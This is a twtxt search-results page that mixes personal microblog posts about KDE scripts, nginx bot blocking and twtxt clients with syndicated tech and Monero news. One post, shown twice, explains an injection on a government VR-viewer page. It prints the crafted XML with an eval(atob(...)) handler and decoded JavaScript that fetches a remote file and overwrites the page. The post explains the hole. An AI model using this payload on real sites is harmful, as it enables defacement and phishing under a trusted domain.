Searching txt.sour.is

Twts matching #Ads
Sort by: Newest, Oldest, Most Relevant

Even though I really do like the shell, I always use Dolphin to mount my digicam SD card and copy the photos onto my computer. I finally added a context menu item in Dolphin to create a forest stroll directory with the current date in order to save some typing:

Image

The following goes in ~/.local/share/kservices5/ServiceMenus/galmkdir.desktop:

[Desktop Entry]
Type=Service
X-KDE-ServiceTypes=KonqPopupMenu/Plugin,inode/directory
Actions=Waldspaziergang;

[Desktop Action Waldspaziergang]
Name=Heutigen Waldspaziergang anlegen…
Icon=folder-green
Exec=~/src/gelbariab/galmkdir "%f"

In order to update the KDE desktop cache and make this action menu item available in Dolphin, I ran:

kbuildsycoca5

The referenced galmkdir script looks like that:

#!/bin/sh
set -e

current_dir="$1"
if [ -z "$current_dir" ]; then
    echo "Usage: $0 DIRECTORY" >&2
    exit 1
fi

dir="$(kdialog \
    --geometry 350x50 \
    --title "Heutigen Waldspaziergang anlegen" \
    --inputbox "Neues Verzeichnis in „$current_dir“ anlegen:" \
    "waldspaziergang-$(date +%Y-%m-%d)")"
mkdir "$current_dir/$dir"
dolphin "$current_dir/$dir"

This solution is far from perfect, though. Ideally, I’d love to have it in the “Create New” menu instead of the “Actions” menu. But that doesn’t really work. I cannot define a default directory name, not to mention even a dynamic one with the current date. (I would have to update the .desktop file every day or so.) I also failed to create an empty directory. I somehow managed to create a directory with some other templates in it for some reason I do not really understand.

Let’s see how that works out in the next days. If I like it, I might define a few more default directory names.

⤋ Read More

10 Great Movies That Were Made into Bad Musicals
Some movies are iconic and beloved for their compelling stories, unforgettable characters, and immersive worlds. However, not every film can make a successful transition to the stage. Cinema and theatre are very different, and while a plot may seem amazing on screen, it often doesn’t translate well when songs are added. Here are 10 great […]

The post [10 Great Movies That Were Made into Bad Musicals](https://listverse.com/2025/04/10/1 … ⌘ Read more

⤋ Read More

guys omg the people behind pico.sh are so nice ;_; one of the people running it emailed me to let me know i had what was likely a malfunctioning (or well, not working as intended) script that was spawning the same SSH tunnel over and over and they wanted to give me a heads up.

and i felt SO BAD because i worried i was straining their service or something so i disabled my 4 tunnels (they were serving little SSH games and services) and got back to them.

but i just woke up to THE NICEST EMAIL EVER reassuring me that i was actually using it as intended, it was just my script that was having problems, and they even said that if it was intended to work that way it was fine and they just wanted to let me know!

so i restarted the tunnels but have since added lockfiles as safeguards so that when the script is run it’ll check if it’s already running :D

⤋ Read More
In-reply-to » I am not interested at all. If I want to interact/socialise/whatever on the Fediverse (which I do), I simply use it. I would like to keep twtxt separate.

Adding to this, we already tried. It didn’t go too well. Slightly related—because it is a third party “integration”—I might be a “smaller group” member, but I don’t care much about one-way feeds (mostly RSS from blogs, news articles, etc.) either.

⤋ Read More
In-reply-to » This weekend (as some of you may now) I accidently nuke this Pod's entire data volume 🤦‍♂️ What a disastrous incident 🤣 I decided instead of trying to restore from a 4-month old backup (we'll get into why I hadn't been taking backups consistently later), that we'd start a fresh! 😅 Spring clean! 🧼 -- Anyway... One of the things I realised was I was missing a very critical Safety Controls in my own ways of working... I've now rectified this...

@lyse@lyse.isobeef.org I’m open to other suggestions 🤣 But hopefully both adding the additional prompt, not allowing it to enter shell history and removing from my shell history prevents me from doing such silly things in haste by pressing ^R and using fuzzy search which if you type fast you sometimes get wrong 😑

⤋ Read More

[$] Supporting untorn buffered writes
At last year’s
Linux Storage, Filesystem,
Memory-Management, and BPF Summit (LSFMM+BPF), there was a discussion about atomic writes that was
accompanied by patches to support the feature in the block layer, and for
direct I/O on XFS. That
work was merged, but another piece of that discussion concerned adding the
feature for buffered I/O, in part because the PostgreSQL database currently
has to jump through hoops to ensure that its writes are not “torn”
(partial … ⌘ Read more

⤋ Read More

[$] Better hugetlb page-table walking
The kernel must often step through the page tables of one or more processes
to carry out various operations. This “page-table walking” tends to be
performed by ad-hoc (duplicated) code all over the kernel. Oscar Salvador
used a memory-management-track session at the 2025 Linux Storage,
Filesystem, Memory-Management, and BPF Summit to talk about strategies to
unify the kernel’s page-table walking code just a little bit by making
hugetlb pages look more like ordinary pages. ⌘ Read more

⤋ Read More
In-reply-to » Hi, So i made a little MVP registry crawler tool for twtxt. It now has a basic UI to play with. It has a somewhat full history back to about 2018-ish. Plus some interesting bits that were timestamped to earlier.

it adds users by finding them in feeds mentioning or following. Your URL is already added.

Hmm i am not sure how you got the URL with users at the end..

⤋ Read More
In-reply-to » Hi, So i made a little MVP registry crawler tool for twtxt. It now has a basic UI to play with. It has a somewhat full history back to about 2018-ish. Plus some interesting bits that were timestamped to earlier.

it adds users by finding them in feeds mentioning or following. Your URL is already added.

Hmm i am not sure how you got the URL with users at the end..

⤋ Read More
In-reply-to » There's a secret art easter egg thing, hidden on my website ( https://thecanine.ueuo.com ), for this years April fools event - it's been there for a few weeks, but now I can finally give hints.

@lyse@lyse.isobeef.org you must be loved by all the web developers in town! But ok, I have added all the missing semicolons, that should technically be there, but them not being there, does not make a difference.

Font color change inside every summary element, was a very deliberate choice, to color the text, but leave the arrow black (same as website background). But ok, I rewrote the CSS to hide the arrows and make all summaries white - since this also works better, with some dark theme enforcing browser extensions.

HOWEVER “p” as a child element of “summary” is a thing, that as far as I know, all browsers respect and if a font color is applied only once, I don’t think it matters, if it’s done through HTML or CSS, you smart ass.

⤋ Read More

10 Worst Movies by Great Directors
While the days of movies serving as a cultural monolith are long gone, there are still names out there that demand as much as hundreds of millions of dollars in investment from companies and demand from audience members many hours in driving to theaters, watching ads, reading or writing essays devoted to their work. Whether […]

The post 10 Worst Movies by Great Directors appeared first on [L … ⌘ Read more

⤋ Read More

The Bizarre Origin Stories of Ten World-Famous Brand Names
Large corporations have perfected marketing and branding in the decades since the era portrayed on the famed TV show Mad Men. Back then, ad agencies and marketing experts were just trying to figure out how to advertise to the average consumer. Nowadays, there are all kinds of focus groups, algorithms, and tactics—both shrewd and shady—that’ll […]

The post [The Bizarre Origin Stories of Ten World-Famous Brand Names] … ⌘ Read more

⤋ Read More
In-reply-to » Thank you @python_valencia for letting me show you the secrets of a decentralised plain text social network like twtxt. I hope you enjoyed the talk! ❤️🐍 Media Media #python #twtxt

thanks andros!

instead of adding the new twt at the end of the feed, do it at the beginning
The PHP client did that originally, although I didn’t see a real benefit if you use… a client.
It could help if you read the .txt file through a browser or something. Also, not many clients are prepared to cut the request, and you can’t rely on the file being organized that way, so finally we dropped that feature.

⤋ Read More
In-reply-to » Thank you @python_valencia for letting me show you the secrets of a decentralised plain text social network like twtxt. I hope you enjoyed the talk! ❤️🐍 Media Media #python #twtxt

@bender@twtxt.net I taught the whole ecosystem 😁
@prologic@twtxt.net @eapl.me@eapl.me The question I was asked the most was: How do I discover people?
Someone came up with a fantastic idea, instead of adding the new twt at the end of the feed, do it at the beginning. So you can paginate by cutting the request every few lines.

⤋ Read More
In-reply-to » I am working on this: https://dm-echo.andros.dev/ More news coming soon. #twtxt

@eapl.me@eapl.me I think the benefits do not outweigh the disadvantages. Clients would have to read and merge the information from 2 txt and a new metadata would have to be added with the address of this file.
Also, it is very easy to filter or ignore it.

⤋ Read More

It’s extremely surprising to me that younger non-technical people just type in their full name (properly cased first and last name with a space in between) for a technical username in account registration or login forms. I’ve seen that happening several times in the past few years. The field name is “Benutzername” in German, literally “username”. Even adding a placeholder text to signal that they could simply use their nickname in lowercase did not change anything at all. Well, one person used at least an e-mail address.

This wasn’t the case six, seven years ago, everybody had some “real” username. Even non-techies. It looks like some “common knowledge” is getting lost. Strange. Very weird. It trips me every time I see it.

Have you experienced something similar?

⤋ Read More
In-reply-to » Righto, now with added basic subject support. Hopefully!

Perfect!

Image

I now also implemented basic replying by hitting a as in answering. What’s missing is automatically adding mentions in the message text template. That’s gonna be a bit more tricky, though.

⤋ Read More

[$] MM medley: huge page allocation, page promotion, KSM, and BPF
As the 2025 Linux\
Storage, Filesystem, Memory-Management, and BPF Summit (LSFMM+BPF)
approaches, the density of memory-management patches on the mailing lists
has increased. Included among those are patches aimed at improving the
reliability and performance of huge-page allocation, implementing page
promotion on tiered-memory systems, adding a different approach to
deduplicating memory, and replacing the BPF memory alloc … ⌘ Read more

⤋ Read More
In-reply-to » Hi! For anyone following the Request for Comments on an improved syntax for replies and threads, I've made a comparative spreadsheet with the 4 proposals so far. It shows a syntax example, and top pros and cons I've found: https://docs.google.com/spreadsheets/d/1KOUqJ2rNl_jZ4KBVTsR-4QmG1zAdKNo7QXJS1uogQVo/edit?gid=0#gid=0

@eapl.me@eapl.me Good job! I have added these comments:

  1. It is only long for humans. Clients can only leave a hyperlink.
  2. The nickname is just a decoration, only the date that acts as the id and the URL matter. The nick is used for humans reading the feed.
  3. It can be migrated with a script, if the feed exists.

⤋ Read More

ditatompel releases ‘xmr-remote-nodes’ v0.2.1
ditatompel1 has released xmr-remote-nodes 2 version 0.2.13 with a fix for CVE-2024-453384, new features and updates:

Changes overview

”`

  • fix: CVE-2024-45338 in #173
  • feat: Added tor hidden service via HTTP header
  • feat: Added more information on monero node details page
  • feat: Added curl example command to Node details modal and page
  • feat: Store hashed user IP address when submitting new node
  • build(de … ⌘ Read more”`

⤋ Read More

U.S. Added to Global Human Rights Watchlist Over Declining Civil Liberties
Solcyré Burga,  Staff Reporter  -  Time Magazine

_Stephan: Psychopath Trump – I say psychopath, by the way, because no functioning rational person would behave as Trump is behaving – aided by the MAGAt flying monkeys – an image from the Wizard of Oz – in Congress are not only destroying our democrsacy and economy, they are also completely trashing the stature of the United … ⌘ Read more

⤋ Read More

Apple Pulls iPhone 16 Ad Showing Off ‘More Personal Siri’
Apple has pulled an ad for the iPhone 16 that depicted a “ more personal Siri,” following the company’s admission last week that it is delaying some of the Apple Intelligence Siri features that it originally expected to release in iOS 18.

Image

English actor Isabella Ramsey starred in the now-private YouTube video, [o … ⌘ Read more

⤋ Read More

tvOS 18.4 Beta Further Hints at Apple’s Work on Smart Home Hub
In the latest beta of tvOS 18.4, there are new hints of Apple’s work on a smart home hub accessory that’s rumored to be coming as soon as this year. MacRumors found that Apple has added ChatKit framework to the tvOS code, which is curious as there is no Messages app available on the Apple TV or the HomePod.

![](https://images.macrumors.com/art … ⌘ Read more

⤋ Read More
In-reply-to » I went on a 5:30 hours long hike to my second backyard mountain. About 12km to get there and roughly 9km on the way back. It was super nice, sunny all day long, 12°C and luckily just a little bit of wind. Great scenery. I managed to capture one great spotted woodpecker hammering along. There was also a kestrel hovering over a meadow and then landing on a sports field light pole. At the castle ruin I could watch 10-12 gliding red kites (with the V-shaped tail) and other raptors, maybe bussards, I don't know, for about five minutes. That was fascinating. Unfortunately, my camera doesn't too well with moving targets.

And I just added a video clip of the woodpecker. As you can easily see from the shaking, it hammers so dang hard that the whole ground around the tree vibrates.

⤋ Read More

I hate to say it .. but we as a species have peaked at this moment. It’s all down hill from here.

⤋ Read More

SChernykh releases P2Pool v4.4
SChernykh1 has released P2Pool 2 version 4.43 with various new features and fixes.

Changes overview
New Features:
* Added RPC-SSL support for Monero node connections
* Removed deprecated --config command line parameter
* Faster initial sync (0.5-1 seconds saved on verification of blocks)
Bugfixes:
* Updated internal dependencies

The full list of changes since v4.3 is available on Github4.

Before using the software, you should v … ⌘ Read more

⤋ Read More

** Skwaking Week Notes **
I’d never thought about adding playlists to my website, but then I did it and now I wanna add more. While I wait to put together another playlist, here’s the song that I’m listening to right now — Lady Lamb’s“Crane Your Neck.”

We had a few big snows, so the kids spent extra time at home and we’ve done a fair bit of sledding and shoveling. There was a bunch of frozen rain after one of the snow storms, so the snow had a crunch … ⌘ Read more

⤋ Read More

iOS 18.4 Adds New Ambient Music Feature
In iOS 18.4, there’s a new Ambient Music option that can be added to Control Center. There are four different sound categories, including Sleep, Chill, Productivity, and Wellbeing.

Image

Each category can be added to Control Center separately, and tapping one plays a random selection of sounds or music from that particular category.

You can’t choose what’s playing from Control Center, but if … ⌘ Read more

⤋ Read More

Meeting summary: Monero Research Lab, 19 February 2025
This is a comprehensive summary, with added reference links, of the MRL meeting1 from February 19th 2025, 1700 UTC.

Logs

The raw, unedited, full log file for this meeting:

250219-mrl.log (168 lines)

Summary

Note: it is possible that some relevant information may be missing from this summary; read the full log file for the complete, unedited discussion.

⤋ Read More

I’m continuing my tt rewrite in Go and quickly implemented a stack widget for tview. The builtin Pages is similar but way too complicated for my use case. I would have to specify a mandatory name and some additional options for each page. Also, it allows me to randomly jump around between pages using names, but only gives me direct access the first, however, not the last page. Weird. I don’t wanna remember names. All I really need is a classic stack. You open a new fullscreen dialog and maybe another one on top of that. Closing the upper most brings you back to the previous one and so on.

The very first dialog I added is viewing the raw message text. Unlike in @arne@uplegger.eu’s TwtxtReader, I’m not able to include the original timestamp, though. I don’t have it in its original form in the database. :-/

Next up is a URL view.

⤋ Read More

@andros@twtxt.andros.dev it seems your GtS has issues:

Warning! It looks like trusted-proxies is not set correctly in this instance’s configuration. This may cause rate-limiting issues and, by extension, federation issues.

If you are the instance admin, you should fix this by adding 10.66.66.1/32 to your trusted-proxies.

⤋ Read More
In-reply-to » reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:

@bmallred@staystrong.run Surprisingly, my

User-agent: *
Disallow: /

seems to work. Or maybe those bastards change their user agent and claim to be someone nice. In any case, I just added a bunch of

location = /robots.txt {
    add_header Content-Type text/plain;
    return 200 "User-agent: *\nDisallow: /\n";
}

in my nginx config. No need for any bot to visit, crawl and index most of my sites.

⤋ Read More

10 Unbelievable Advertising Fiascoes
For various reasons, product advertisements sometimes go awry in a big way. A case in point: Budweiser Light’s ad campaign featuring transgender influencer Dylan Mulvaney resulted in a boycott that cost the company almost 1.5 billion dollars, as customers switched from Bud Light to competitors’ brands. As Harvard Business Review points out, companies learned that […]

The post [10 Unbelievable Advertising Fiascoes](https://listverse.com/2025/02/12/10-unbeliev … ⌘ Read more

⤋ Read More

Will Apple Release New iPhone 16 Colors This Year?
Apple typically releases new iPhone color options every year as a mid-product cycle refresh, so when can we expect a new finish in 2025?

Image

Apple has added new ‌iPhone‌ colors on six occasions in the past, consistently in either the March or April following an ‌iPhone‌’s launch:

  • iPhone 7 and 7 Plus: (PRODUCT)RED (Tuesday … ⌘ Read more

⤋ Read More

Pineboards Introduces Modulo Carrier Boards for Raspberry Pi CM5 and CM4
Pineboards has introduced the Modulo4, Modulo5 Basic, and Modulo5 IO PoE+ carrier boards, adapting Raspberry Pi Compute Modules to the Raspberry Pi 5 form factor. These boards maintain compatibility with PCIe HATs, cases, and cooling solutions, with the Modulo5 IO PoE+ adding PoE+ support for network-powered operation. Pineboards indicates that with the release of the […] ⌘ Read more

⤋ Read More

How to Watch Super Bowl LIX Free on iPhone, iPad, Mac, and Apple TV
Super Bowl LIX takes place this Sunday, February 9. In the U.S., the game will be streaming for free in upscaled 4K on FOX’s ad-supported streaming service Tubi, which is available on the iPhone, iPad, Mac, Apple TV, Apple Vision Pro, and many other devices.

Image

This year, the Kansas City Chi … ⌘ Read more

⤋ Read More

Using AirTags for Dogs: Track Your Pet for Added Peace of Mind
Using AirTags to keep track of a dog can offer some additional peace of mind, especially if you’re worried about your fuzzy companion wandering off. Whether your dog has a penchant to escape out of your yard, has a tendency to bolt, or simply likes to run off at any opportunity, AirTags can provide a … Read MoreRead more

⤋ Read More

Netflix Increases Prices Again
Netflix is raising its prices for all plans in several countries, including the United States, Canada, Portugal, and Argentina. The cheapest Standard with ads plan will be $1 more expensive in the U.S., going from $6.99 to $7.99 per month.

Image

The Standard plan’s price will increase from $15.49 to $17.99 per month, and the Premium plan will now cost $24.99 per month, up from $22.99 per month. The St … ⌘ Read more

⤋ Read More

Instagram Adds New Features to Reels as TikTok Ban Looms
With TikTok on track to be banned from U.S. app stores starting on Sunday, Instagram is adding new features to Reels, its video-based feature that’s modeled after TikTok.

Image

Going forward, there will be a new Reels feed that includes videos that your friends have liked or commented on, so you can see what your friends have watched and what they like. Your friends … ⌘ Read more

⤋ Read More
In-reply-to » 🤔 Prosoal: Disallowed the @<url> form of mentions. Strictly require that all mentions include a nickname/name; i.e: @<name url>.

Sounds about as complex as adding @nick@domain support by doing a webfinger lookup to get the URL.

⤋ Read More
In-reply-to » 🤔 Prosoal: Disallowed the @<url> form of mentions. Strictly require that all mentions include a nickname/name; i.e: @<name url>.

Sounds about as complex as adding @nick@domain support by doing a webfinger lookup to get the URL.

⤋ Read More
In-reply-to » Alright, I have a little 8086 assembler for my toy OS going now – or rather a proof-of-concept thereof. It only supports a tiny fraction of the instruction set. It was an interesting learning experience, but I don’t think trying to “complete” this program is worth my time.

@lyse@lyse.isobeef.org Yeah, what else does one need? 😅

I added more instructions, made it portable (so it runs on my own OS as well as Linux/DOS/whatever), and the assembler is now good enough to be used in the build process to compile the bootloader:

Image

That is pretty cool. 😎

It’s still a “naive” assembler. There are zero optimizations and it can’t do macros (so I had to resort to using cpp). Since nothing is optimized, it uses longer opcodes than NASM and that makes the bootloader 11 bytes too large. 🥴 I avoided that for now by removing some cosmetic output from the bootloader.

⤋ Read More
In-reply-to » Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html

So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>


the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

⤋ Read More
In-reply-to » Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html

So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>


the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

⤋ Read More

I need an alternative news source… Something I can shove into feeds.twtxt.net that helps me keep up-to-date with Tech and other important news 🗞️ Hmmm 🤔 Suggestions? I can’t stand Slashdot anymore since they’ve decided to come down hard on ad-blockers 🤦‍♂️

⤋ Read More

Apple Stepping Up Plans to Expand News App to More Countries
Apple plans to scale up its News app by adding new countries to the platform beyond the US, Canada, the UK, and Australia, according to the Financial Times.

Image

The plans reportedly include building its locally focused news coverage in the UK, as well as bringing its puzzles section to the coun … ⌘ Read more

⤋ Read More

Boog900 completes Cuprate dev work CCS
Boog9001 has posted a third and final progress report2 for their latest full-time Cuprate 3 development work CCS proposal4:

People have been syncing using the initial binary with mostly success a couple of people have reported issues, which will be investigated [..] Fast sync is yet to be added. I have ideas for optimisations [..] that should significantly speed up sync on top of where we already are (faster than mo … ⌘ Read more

⤋ Read More

P2Pool v4.3 released with initial sync improvements
SChernykh1 has released P2Pool 2 version 4.33 with initial sync improvements, various new features and bugfixes.

Changes overview

”`
New Features:

  • Added –data-dir command line option
  • Added –no-stratum-http command line option to disable HTTP on Stratum ports
  • Faster initial sync (0.5-1 seconds saved on verification of blocks)
    Bugfixes:
  • TLS: fixed not being able to use Letsencrypt certificate … ⌘ Read more”`

⤋ Read More

** Hello my beautiful ghouls **
This is a test. I’m experimenting with adding rss only posts to my website.

This post should only show up in rss feed readers, and, hopefully, leave no other trace on any directory pages on my website.

Each rss-only post will also have a html rendered page, but there won’t be any way to navigate to that page without knowing the actual url for that page. ⌘ Read more

⤋ Read More

Introducing Annotated Logger: A Python package to aid in adding metadata to logs
We’re open sourcing Annotated Logger, a Python package that helps make logs searchable with consistent metadata.

The post [Introducing Annotated Logger: A Python package to aid in adding metadata to logs](https://github.blog/developer-skills/programming-languages-and-frameworks/introducing-annotated-logger-a-python-package-to-aid-in-a … ⌘ Read more

⤋ Read More

[ANN] PiNodeXMR v6.24.12 update available - (Ban Lists)

Hi all, here at PiNodeXMR we’ve been following along with the MRL ban list discussion and have re-added the function to pull-in a ban list of IPs. In the name of decentralisation/anti-censorship, the ban lists are optional for PiNodeXMR users. You can find the new options in your terminal setup menu under “Extra Network tools”.

Links:

⤋ Read More
In-reply-to » One benefit with bluesky is your username is also a website. And not a clunky URL with slashes and such. I wish twtxt adopted that. I have advocated for webfinger to for twtxt to let us do something like it with usernames. Nostr has something like it

@eapl.me@eapl.me why not https://domain.com/.well-known/twtxt/:domain/:user ?

the business card test is this can you write it on your business card and have someone you give it to be able to figure it out without added context?

  • phone number: yes because everyone knows what a phone number is.
  • email address: yes, everyone knows an email and their aol or prodigy will let them email.
  • twitter/x/insta/pintrest handle: no, whats a twitter? do i need to sign up?
  • domain name: yes its simple and you just type it in a browser right?
  • twtxt url: kinda? its a bit long and is that a forward slash? or a backward slash?

⤋ Read More
In-reply-to » One benefit with bluesky is your username is also a website. And not a clunky URL with slashes and such. I wish twtxt adopted that. I have advocated for webfinger to for twtxt to let us do something like it with usernames. Nostr has something like it

@eapl.me@eapl.me why not https://domain.com/.well-known/twtxt/:domain/:user ?

the business card test is this can you write it on your business card and have someone you give it to be able to figure it out without added context?

  • phone number: yes because everyone knows what a phone number is.
  • email address: yes, everyone knows an email and their aol or prodigy will let them email.
  • twitter/x/insta/pintrest handle: no, whats a twitter? do i need to sign up?
  • domain name: yes its simple and you just type it in a browser right?
  • twtxt url: kinda? its a bit long and is that a forward slash? or a backward slash?

⤋ Read More

Living together: Reflections on collective living
[A version of this post was initially published on 2022-05-30 (Setting
Orange, the 4 day of Confusion in the YOLD 3188) in my gemlog at:

gemini://gem.hack.org/log/collectives.gmi

It’s been slightly edited and a few photos added.

Posted on the blog on 2024-12-15 02:33 +0100. Later updated with how
Area 41 ended.]

I dreamt about Dial House last night. I’ve never been there, but it
was like I belonged, like I was meant to be th … ⌘ Read more

⤋ Read More

Living together: Reflections on collective living
[A version of this post was initially published on 2022-05-30 (Setting
Orange, the 4 day of Confusion in the YOLD 3188) in my gemlog at:

gemini://gem.hack.org/log/collectives.gmi

It’s been slightly edited and a few photos added.]

I dreamt about Dial House last night. I’ve never been there, but it
was like I belonged, like I was meant to be there.

Last I heard anything about Dial House they were trying to gather
enough money … ⌘ Read more

⤋ Read More

rehrar releases Stack Wallet v2.1.9, Stack Duo v1.2.4
rehrar1 has released Stack Wallet2 version 2.1.93 and Stack Duo version 1.2.44 with various fixes and improvements.

Changes overview
Stack Wallet:
* Show Monero/Wownero tx private key option
* Fix Frost error
* Stack Wallet Backup fixes
Stack Duo:
* Added Monero churn options
* Paynym temporarily disabled while kinks worked out [..]

The release notes, binaries, and the SHA256 hashes can … ⌘ Read more

⤋ Read More

watchOS 11.2 Lets You Pause iPhone Video With Camera Remote App
In watchOS 11.2, Apple has added a useful new feature that’s designed to allow you to pause video that you’re recording on the iPhone using the Camera Remote app on the Apple Watch.

Image

The Camera Remote app has been available since the Apple Watch initially launched, and while there was an option to start … ⌘ Read more

⤋ Read More

Watch the Touching Apple Holiday Ad for 2024: Heartstrings
Apple has introduced their annual Holiday advertisement for the 2024 season, titled “Heartstrings”, and it’s an unusually moving commercial that focuses on hearing loss and the hearing aids feature of AirPods Pro 2 (which happen to be hugely discounted on Amazon right now, if you’re in the market). In the touching and family oriented commercial, … [Read More](https://osxdaily.com/2024/11/29/watch-the-touching-apple-ho … ⌘ Read more

⤋ Read More

Here is Apple’s Annual Holiday Season Ad
Apple today shared its annual holiday season ad. The video is titled “Heartstrings” and highlights the new hearing aid feature on AirPods Pro 2.

“For so many of us, sound and how we hear shape how we connect to the world around us,” said Apple, in the video description. “Yet, people with hearing loss wait an average of 10 years before getting their hearing tested and fitted for heari … ⌘ Read more

⤋ Read More

Stack Wallet adds support for XMR view-only wallets, ‘churn options’
rehrar1 has released Stack Wallet2 version 2.1.83 with support for Monero view-only wallets and churn options 4, various other changes and bug fixes.

Changes overview


Added Monero churn options
Added ability to set tor/clearnet options for individual nodes
Bug fixes for Solana, Tezos, ETH, Cardano, and epic
Paynym temporarily disabled while kinks worked out
Adju ... ⌘ [Read more](https://monero.observer/stack-wallet-v2.1.8-support-monero-view-only-wallets-churn-options/)

⤋ Read More

[ANN] Monero Remote Node Monitoring project updates

Since my last post on Reddit in June 2024, there have been some major changes and new features.

* updated the license from GLWTS to a more widely recognized and permissive one (BSD-3-Clause)
* UI: switched from SvelteKit to Templ+HTMX to reduce external dependencies
* added support for monitoring both IPv6 and I2P nodes
* set up a Tor Hidden service for the web UI

Links:

⤋ Read More